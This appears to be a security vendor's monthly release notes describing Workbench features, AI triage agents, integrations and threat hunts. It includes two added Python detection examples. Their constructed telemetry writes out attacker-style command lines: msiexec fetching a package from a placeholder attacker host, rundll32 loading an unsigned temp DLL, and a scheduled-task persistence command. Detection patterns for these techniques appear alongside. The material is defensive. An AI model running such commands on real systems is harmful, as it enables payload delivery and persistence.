Check here to learn about Expel's latest features, enhancements, fixes, and other improvements.
May 2026
New Features
- New Threat View
The new Threat View in Expel Workbench is an enhanced alert triage view that makes it easier to combine isolated events from different tools (endpoint, cloud, and network) into the full picture of an attack. New features include:
- Group alerts from different sources by common indicators to quickly build the full attack picture.
- Share views with other users, as well as save views to their account to reference different triage configurations or historical alerts.
- View and triage phishing submissions in a grid layout.
- Additional columns, sort options, and filter options available.
- Blocked malware triage agent
A new investigative action uses Ruxie AI's blocked malware triage agent to automate the manual triage workflow for blocked malware alerts. It enriches the file (VirusTotal, VMRay sandbox, prior Workbench history, process and host data from Microsoft Defender), applies a deterministic 7-rule decision engine, and presents an Approve or Escalate recommendation to the analyst, keeping a human in the loop.
New Hunts
- Suspicious Msiexec.exe Activity
This hunt analyzes time-based aggregations of commands and network activity across hosts, along with file signatures and file path activity, to detect potential abuse of msiexec.exe. It helps identify attackers leveraging this binary to gain unauthorized access, escalate privileges, or establish persistence, including through proxy execution, process injection, DLL payload loading, Rundll32.exe abuse, scheduled task creation, process tampering, and command or script interpreter invocation.
- Office365 Self-service App Anomalies
This hunt groups Entra ID sign-in events by source Autonomous System Number (ASN), a reliable proxy for the originating network organization, and profiles the volume and variety of self-service portal app authentications per ASN against your organizational baseline. Supporting signals such as token types, outcomes, user agents, and authentication methods are also surfaced to help analysts focus their investigation on the most relevant portions of the data.
- MS Sharepoint Exfiltration Activity
This hunt surfaces anomalies by breaking down SharePoint activity per user, per session, and per hour, capturing the distinct zones, libraries, and files accessed, the operations performed, and the search terms used.
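As an added illustration of the Office365 Self-service App Anomalies hunt described above (example code written for this page, not Expel's hunt implementation): it builds a per-ASN baseline from a week of constructed Entra ID sign-in events, then profiles the volume and variety of self-service portal sign-ins per ASN on a hunt day against that baseline, and surfaces outcomes, user agents, authentication methods and token types for whatever it flags. The event field names, the list of self-service apps, the thresholds and every event are assumptions.

```python
"""Per-ASN baseline profiling of Entra ID self-service sign-ins.

Added example, not Expel's hunt code. Event fields (day, asn, app, user,
result, token, ua, method), the app list and the thresholds are assumptions,
and every event below is constructed.
"""
from collections import Counter, defaultdict
from statistics import mean, pstdev

# Apps reachable through the Microsoft self-service portals (assumed list).
SELF_SERVICE_APPS = {"My Apps", "My Account", "My Sign-Ins", "My Groups", "Password Reset"}


def constructed_events():
    """Seven baseline days of normal traffic plus a hunt day (day 8)."""
    events = []
    for day in range(1, 9):
        # Corporate egress ASN: ten users a day across two portal apps.
        for i in range(10):
            events.append(dict(day=day, asn=64500, app=("My Apps", "My Account")[i % 2],
                               user=f"user{i}@corp.example", result="success",
                               token="primaryRefreshToken", ua="Edge/Windows",
                               method="Windows Hello for Business"))
        # One remote worker on a residential ASN, also normal.
        events.append(dict(day=day, asn=64501, app="My Apps", user="remote@corp.example",
                           result="success", token="sessionToken", ua="Chrome/macOS",
                           method="Password + Authenticator"))
    # Day 8 only: a never-seen ASN walks twelve accounts through reset and
    # sign-in pages with a scripted client and password-only authentication.
    for i in range(12):
        events.append(dict(day=8, asn=64502,
                           app=("Password Reset", "My Sign-Ins", "My Account")[i % 3],
                           user=f"user{i}@corp.example",
                           result="failure" if i % 2 else "success",
                           token="sessionToken", ua="python-requests/2.31",
                           method="Password"))
    return events


def daily_profile(events):
    """Volume, distinct apps and distinct users of self-service sign-ins per (asn, day)."""
    prof = defaultdict(lambda: {"volume": 0, "apps": set(), "users": set()})
    for e in events:
        if e["app"] in SELF_SERVICE_APPS:
            p = prof[(e["asn"], e["day"])]
            p["volume"] += 1
            p["apps"].add(e["app"])
            p["users"].add(e["user"])
    return prof


def build_baseline(events):
    """Per ASN: mean and population stdev of daily volume, plus every app ever seen."""
    per_asn = defaultdict(lambda: {"daily": [], "apps": set()})
    for (asn, _day), p in daily_profile(events).items():
        per_asn[asn]["daily"].append(p["volume"])
        per_asn[asn]["apps"] |= p["apps"]
    return {asn: {"mean": mean(v["daily"]), "stdev": pstdev(v["daily"]), "apps": v["apps"]}
            for asn, v in per_asn.items()}


def hunt(baseline, events, day, min_volume=5, z=3.0):
    """Flag ASNs on `day` that are new, unusually busy, or touching apps they never used."""
    findings = []
    for (asn, d), p in daily_profile(events).items():
        if d != day:
            continue
        reasons = []
        base = baseline.get(asn)
        if base is None:
            if p["volume"] >= min_volume:
                reasons.append("ASN absent from baseline")
        else:
            # Floor the stdev so a perfectly flat baseline still tolerates small drift.
            threshold = base["mean"] + z * max(base["stdev"], 1.0)
            if p["volume"] > threshold:
                reasons.append(f"volume {p['volume']} above baseline threshold {threshold:.1f}")
            new_apps = p["apps"] - base["apps"]
            if new_apps:
                reasons.append(f"apps not seen in baseline: {sorted(new_apps)}")
        if not reasons:
            continue
        todays = [e for e in events
                  if e["asn"] == asn and e["day"] == day and e["app"] in SELF_SERVICE_APPS]
        # Supporting signals an analyst pivots on, broken out per flagged ASN.
        findings.append({
            "asn": asn, "volume": p["volume"], "distinct_apps": len(p["apps"]),
            "distinct_users": len(p["users"]), "reasons": reasons,
            "outcomes": dict(Counter(e["result"] for e in todays)),
            "user_agents": dict(Counter(e["ua"] for e in todays)),
            "auth_methods": dict(Counter(e["method"] for e in todays)),
            "token_types": dict(Counter(e["token"] for e in todays)),
        })
    return sorted(findings, key=lambda f: -f["volume"])


if __name__ == "__main__":
    evs = constructed_events()
    base = build_baseline([e for e in evs if e["day"] < 8])
    for finding in hunt(base, evs, day=8):
        print(finding)
```

The stdev floor matters: a perfectly regular baseline has zero variance, and without it a single extra sign-in from the corporate ASN would fire. In production the ASN would come from the sign-in record's network location rather than a constructed integer, and the failure ratio and user-agent rarity would feed the score rather than only being surfaced alongside it.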
April 2026
New Features
- DUET + Verify Summaries (Beta): DUET notifications and automated Verify actions now include AI-generated summaries written specifically for each alert, replacing the previous templated text. Each notification includes an executive summary, extracted key fields, a danger assessment, and a confidence note that flags missing data that could affect your decision.
- Zendesk Syncing for Slack and Teams: Customers can now create, comment on, and attach files to Zendesk support tickets directly from their Slack or Teams channels by using @Ruxie, eliminating the need to log into Zendesk separately. Comments are synced bidirectionally, so replies in Slack/Teams post to the Zendesk ticket and responses added in Zendesk are reflected back in the channel thread. Note: We're exploring resolving tickets directly from Slack/Teams in a future release.
- SentinelOne Status Syncing: Alert statuses and analyst comments now sync from Expel Workbench back to SentinelOne Singularity Endpoint in real time as our SOC triages and resolves Expel Alerts. SentinelOne users get full visibility into Expel's actions and verdicts without leaving their EDR console.
- New Alert Grid: The new grid view in Expel Workbench makes it easier to combine isolated events across endpoint, cloud, and network tools into a full picture of an attack.
- Group alerts from different sources by common indicators to build the full attack picture faster
- Save views to your account and share them with other users to reference different triage configurations or historical alerts
- Triage phishing submissions directly in grid view
- Additional columns, sort options, and filters
New Hunts
- SaaS Hunts:
- Suspicious MSFT Intune Device Management Scope Grants
- Endpoint & On-Prem:
- Suspicious Rundll32.exe Activity
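The Suspicious Msiexec.exe Activity hunt in the May notes above and the Suspicious Rundll32.exe Activity hunt here both rest on aggregating process, file-signature and network telemetry per host over a time window rather than judging single events. The block below is an added example written for this page, not Expel's hunt logic: it buckets constructed process-creation and network events into ten-minute windows per host and scores each window for remote-package installs, msiexec /y DLL registration, msiexec or rundll32 spawning interpreters or schtasks, rundll32 loading unsigned DLLs from user-writable paths, and outbound connections from either binary. Event field names, weights, and all events and signature results are assumptions.

```python
"""Time-windowed scoring of msiexec.exe / rundll32.exe activity per host.

Added example, not Expel's hunt logic. Event shapes, weights and thresholds
are assumptions; every event and signature result below is constructed.
"""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

WINDOW = 600  # seconds: one bucket per host per ten minutes

# Children that a normal install rarely launches from msiexec or rundll32.
INTERPRETERS = {"rundll32.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "schtasks.exe", "regsvr32.exe"}
# Parents that rarely start installers legitimately (Office, script hosts).
ODD_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
               "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
USER_WRITABLE = re.compile(r"\\(?:users\\[^\\]+\\appdata|programdata|windows\\temp|temp)\\", re.I)
URL = re.compile(r"https?://", re.I)
DLL_REGISTER = re.compile(r"\s/[yz]\s", re.I)  # msiexec /y|/z call DllRegisterServer/Unregister
RUNDLL_TARGET = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)', re.I)
# Explicit RFC 1918 ranges: ipaddress.is_private also covers documentation
# ranges such as 203.0.113.0/24, which we want to treat as external here.
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed telemetry: WS-A is a managed install, WS-B is a malicious chain.
PROCESS_EVENTS = [
    dict(ts=1000, host="WS-A", image="msiexec.exe", parent="ccmexec.exe",
         cmdline=r"msiexec.exe /i C:\Windows\ccmcache\a1\app.msi /qn"),
    dict(ts=2000, host="WS-B", image="msiexec.exe", parent="winword.exe",
         cmdline="msiexec.exe /q /i http://203.0.113.10/update.msi"),
    dict(ts=2030, host="WS-B", image="rundll32.exe", parent="msiexec.exe",
         cmdline=r"rundll32.exe C:\Users\bob\AppData\Local\Temp\x.dll,Start"),
    dict(ts=2040, host="WS-B", image="schtasks.exe", parent="rundll32.exe",
         cmdline=r'schtasks /create /sc onlogon /tn Updater /tr "rundll32 C:\Users\bob\AppData\Local\Temp\x.dll,Start"'),
    dict(ts=2050, host="WS-B", image="msiexec.exe", parent="cmd.exe",
         cmdline=r"msiexec /y C:\Users\bob\AppData\Local\Temp\p.dll"),
]
NETWORK_EVENTS = [
    dict(ts=1005, host="WS-A", image="msiexec.exe", dst="10.20.30.40", port=80),
    dict(ts=2010, host="WS-B", image="msiexec.exe", dst="203.0.113.10", port=80),
]
# Authenticode verdicts keyed by (host, lowercased path), as a signature feed would supply.
FILE_SIGNATURES = {("WS-B", r"c:\users\bob\appdata\local\temp\x.dll"): False}


def is_internal(ip):
    return any(ip_address(ip) in net for net in RFC1918)


def bucket(ts):
    return ts - ts % WINDOW


def hunt(process_events, network_events, file_signatures, min_score=4):
    """Score each (host, window); return the buckets at or above min_score with reasons."""
    agg = defaultdict(lambda: {"score": 0, "reasons": []})

    def hit(host, ts, weight, reason):
        entry = agg[(host, bucket(ts))]
        entry["score"] += weight
        entry["reasons"].append(reason)

    for e in process_events:
        host, ts = e["host"], e["ts"]
        img, parent, cmd = e["image"].lower(), e["parent"].lower(), e["cmdline"]
        if img == "msiexec.exe":
            if URL.search(cmd):
                hit(host, ts, 3, "msiexec installing a package from a URL (proxy execution)")
            if DLL_REGISTER.search(cmd):
                hit(host, ts, 3, "msiexec /y or /z loading a DLL via DllRegisterServer")
            if parent in ODD_PARENTS:
                hit(host, ts, 1, f"msiexec spawned by {parent}")
        if parent in ("msiexec.exe", "rundll32.exe") and img in INTERPRETERS:
            hit(host, ts, 2, f"{parent} spawned {img}")
        if img == "rundll32.exe":
            m = RUNDLL_TARGET.search(cmd)
            dll = m.group(1).lower() if m else ""
            if USER_WRITABLE.search(dll):
                hit(host, ts, 2, "rundll32 loading a DLL from a user-writable path")
            if file_signatures.get((host, dll)) is False:
                hit(host, ts, 2, f"rundll32 target is unsigned: {dll}")
        if img == "schtasks.exe" and "/create" in cmd.lower():
            hit(host, ts, 1, "scheduled task creation")

    for n in network_events:
        if n["image"].lower() in ("msiexec.exe", "rundll32.exe") and not is_internal(n["dst"]):
            hit(n["host"], n["ts"], 2, f"{n['image']} connected to external {n['dst']}:{n['port']}")

    return {key: val for key, val in agg.items() if val["score"] >= min_score}


if __name__ == "__main__":
    for (host, start), result in hunt(PROCESS_EVENTS, NETWORK_EVENTS, FILE_SIGNATURES).items():
        print(host, start, result["score"], *result["reasons"], sep="\n  ")
```

Aggregating first is what separates the benign managed install on WS-A (local MSI, internal destination, nothing spawned) from WS-B, where no single event is conclusive but one window accumulates nine independent signals. The documentation address 203.0.113.10 stands in for an attacker host; because Python's ipaddress module classifies that range as non-global, the example checks explicit RFC 1918 networks instead of is_private.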
March 2026
New Features
- First Seen Vendor Alerts (FSVA) Decision & Detection Agent: We've launched the FSVA (First Seen Vendor Alert) Detection Agent to scale our detection surface. By utilizing an automated reasoning workflow, the agent evaluates novel vendor signals and generates syntactically correct detection candidates for human review.
- Not Malicious Verify Button: We've updated the Verify Action workflow in Workbench and Slack to include more specific disposition options.
Key Changes:
- New button option:
- Added "Not Malicious: Close": A new option to close alerts that are unauthorized policy violations but not security threats. Will auto-close the alert.
- Existing button options:
- Authorized: Confirms activity was expected and auto-closes the alert.
- Not Authorized: Confirms suspicious activity and auto-promotes the alert to an Incident.
- Updated API Requirements: The PATCH /investigative_actions/:id endpoint now takes an authorization_reason for all verify actions so that the correct notification conditions are applied.
- The authorization_reason on PATCH /investigative_actions/:id is not a required field on the backend, so it will not break customers' existing connections.
- We recommend that customers set the authorization_reason field if they plan to use the NOT MALICIOUS: CLOSE verify action disposition, because it changes the SOC notification behavior and the auto-close behavior for this verify action outcome.
New and Updated Integrations
- MDR for Email - Mimecast: Expel now integrates with Mimecast Advanced Email Security. Connecting Mimecast to Expel Workbench unlocks two key capabilities:
- Alert Ingestion & Triage: Expel automatically ingests and triages Mimecast alerts and escalates only real threats
- Active Remediation: Expel can automatically remove confirmed malicious emails from users' inboxes.
- Cisco ASA: Expel now integrates with Cisco ASA, including OOTB rules.
- Cloudflare Zero Trust: Support for ingesting and monitoring security events from Cloudflare's Zero Trust network access and security platform in Workbench.
February 2026
New Features
- Lead Alert Summaries: Summarize the Content of an Alert: When an alert fires, Workbench now displays an AI-generated natural language summary of the alert. The summary includes the most important observables contained within the alert, any context Expel already knows about those observables, and insight into why those observables indicate maliciousness or benignness, helping users more quickly understand what is going on without needing to review individual fields and raw logs.
- Auto Remove Email Remediation Matching Update: The Auto Remove Malicious Email autoremediation has been updated with new matching capabilities. Customers using MDR for Email and/or Phishing who have Gmail or Microsoft configured in Workbench for email removal can now take advantage of date-based filtering, more advanced full or partial matching of emails by subject and/or sender, and the ability to search for multiple senders at once. Note: Microsoft customers using this feature will need to make a permissions change in Microsoft.
- SOC communication just got a major upgrade: We’ve enabled near real-time, two-way messaging between Slack and Expel’s Workbench. You can now thread replies directly onto Slack Investigation Created and Incident Created notifications to reach our SOC Analysts instantly. Their responses will flow back into your Slack thread, creating a seamless conversation loop without you ever having to leave your workspace.
New and Updated Integrations
- JumpCloud (DUET Only): JumpCloud is an identity and device management platform that provides directory services, SSO, multi-factor authentication, and device management capabilities. Expel has mapped signal from JumpCloud to detections that are either triaged by our SOC or automatically enriched and sent to your team via a DUET.
- Arista NDR: Expel now integrates with Arista Network Detection and Response, including custom rules. This integration provides network monitoring and threat detection capabilities for customers using Arista's NDR platform.
- CrowdStrike NG SIEM: Expel now integrates with CrowdStrike NG SIEM, the modern, cloud-native security platform that helps deliver faster, more efficient threat detection, investigation, and response.
January 2026
New Features
- Webhooks for Phishing Notifications: Customers can now configure new Phishing notifications via webhooks in Workbench. These notifications were previously unavailable via webhook but are now available for all Phishing customers. (Phishing Submission Created, Phishing Expel Alert Created, Phishing Expel Alert Reopened)
- Darkmode: Dark mode is a visual way to reduce eye strain for Workbench users. By default, Workbench is now set to mirror user system settings for light/dark mode.
New and Updated Integrations
- JumpCloud (DUET Only): JumpCloud is an identity and device management platform that provides directory services, SSO, multi-factor authentication, and device management capabilities.
- Arista NDR: Expel now integrates with Arista Network Detection and Response, including custom rules. This integration provides network monitoring and threat detection capabilities for customers using Arista's NDR platform.
Updates
- Wiz Status Sync: The Wiz Status Sync feature has been refactored to work with the current version of the Wiz GraphQL API. This functionality enables synchronization of alert statuses between Wiz and Workbench, resuming normal operational behavior for bidirectional status updates.